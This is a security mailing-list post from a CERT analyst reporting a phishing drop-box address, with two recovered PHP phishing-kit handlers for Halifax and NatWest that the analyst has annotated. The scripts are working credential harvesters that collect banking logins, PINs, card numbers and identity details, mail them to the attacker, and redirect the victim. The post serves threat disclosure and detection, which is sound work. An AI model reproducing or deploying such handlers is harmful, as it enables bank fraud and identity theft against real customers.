[nsp-sec] gmail phishing drop-box
Rodolfo Baader
rbaader at arcert.gov.ar
Fri Jul 8 14:29:11 EDT 2011
Hi!
While investigating a phishing case, we found the following drop box (the e-mail address that receives the harvested credentials):
"hardman700 at gmail.com"
Evidence:
==============================================================================
[1] <?
// Analyst note (annotation, not part of the recovered sample): form handler
// that copies the POST fields below into one plain-text message, mails that
// message out, and then redirects the browser to finish.php.
session_start();
// Drop-box address. The " at " spelling is presumably the list archive's
// address obfuscation rather than what the script contained; confirm against
// the original file.
$cc="hardman700 at gmail.com";
// Fields of the first form page, as labelled in $msg below.
$Username = $_POST['Username'];
$Password = $_POST['Password'];
// Client address and submission time, appended to the end of the message.
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
// Fields of the second form page, as labelled in $msg below.
$Fschool = $_POST['fschool'];
$Email = $_POST['emad'];
$EmailPas = $_POST['emad1'];
$POB = $_POST['pob'];
$MFname = $_POST['mfname'];
$FFname = $_POST['ffname'];
$Mmdname = $_POST['mmdname'];
$DTPSN = $_POST['DTPSN'];
$telpass = $_POST['telpass'];
$mwrd = $_POST['mwrd'];
$mwrd2 = $_POST['mwrd2'];
$nis = $_POST['nis'];
$SQ = $_POST['sq'];
$ANS = $_POST['ans'];
// The subject, the From header and the "Created By Vince" footer are constant
// strings, so they can be used as search terms in mail logs and for matching
// other copies of this kit.
$subj = "halifax";
// NOTE(review): the physical line breaks inside this string look like
// mail-archive wrapping; confirm against the original file before relying on
// the exact message layout.
$msg = "First Page\n\nUsername: $Username\nPassword: $Password\n\nSecond
Page\n\nThe name of your first school: $Fschool\nYour place/town of birth :
$POB\nYour mother's FIRST name: $MFname\nYour father's FIRST name: $FFname\nYour
mother's maiden name: $Mmdname\nSecurity Question: $SQ\nAnswer: $ANS\nEmail
Address: $Email\nEmail Password: $EmailPas\n6 Digits Telephone Banking PIN:
$DTPSN\nTelephone Banking Password: $telpass\nMemorable Info: $mwrd \nMemorable
Info: $mwrd2 \nNat-Ins-Numb: $nis \n\nSubmitted from IP Address - $ip on
$adddate\n-------\n Created By Vince\n------";
$from = "From: Shaun Halifax";
// $halifax is not assigned anywhere in this excerpt; the only recipient
// visible here is $cc in the second call.
mail("$halifax", $subj, $msg, $from);
mail("$cc", $subj, $msg, $from);
// Relative redirect, so finish.php is served from the same host and path as
// this handler.
header("Location:finish.php?&Mid=8007_1944504_80296_1758_3472_0_825_16178_712264114&inc=&Search=&YY=20774&order=down&sort=date&pos=0&view=a&head=b#");
?>
=============================================================================
[2] <?
// Analyst note (annotation, not part of the recovered sample): second form
// handler; it mails five POST fields plus the client address to $to and then
// redirects the browser to a page on www.natwest.com.
// $to is the same address as $cc in sample [1]. The " at " spelling is
// presumably the list archive's address obfuscation; confirm against the
// original file.
$to = "hardman700 at gmail.com";
//---------------------------------
// Submitted form fields; the labels in $msg below show what the form asked
// for under each field name.
$DBID_edit = $_POST['DBID_edit'];
$LI6PPEA_edit = $_POST['LI6PPEA_edit'];
$LI6PPED_edit = $_POST['LI6PPED_edit'];
$LI6PMMN_edit = $_POST['LI6PMMN_edit'];
$LI6PPWD_edit = $_POST['LI6PPWD_edit'];
$ip = $_SERVER['REMOTE_ADDR'];
// The subject and the From header are constant strings, so they can be used
// as search terms in mail logs and for matching other copies of this kit.
$subj = "NatWest Bank UK";
// NOTE(review): the physical line breaks inside this string look like
// mail-archive wrapping; confirm against the original file.
$msg = "Enter Your Customer Number : $DBID_edit\nEnter Your PIN :
$LI6PPEA_edit\nEnter Your Password : $LI6PPED_edit\nEnter Your MMN :
$LI6PMMN_edit\nEnter Your Debit Card Number : $LI6PPWD_edit\nIP : $ip";
// The From text is supplied by this script, so the nwolb.com address in it
// says nothing about where the message was actually sent from.
$from = "FROM: BraIn Inc.©<mail at nwolb.com>";
// Bare block with no condition: the mail() call always runs.
{
mail($to,$subj,$msg,$from);
}
// Absolute redirect to www.natwest.com once the message has been handed to mail().
header("location: http://www.natwest.com/tools/general/nwolb_legals/index.htm");
?>
==============================================================================
R.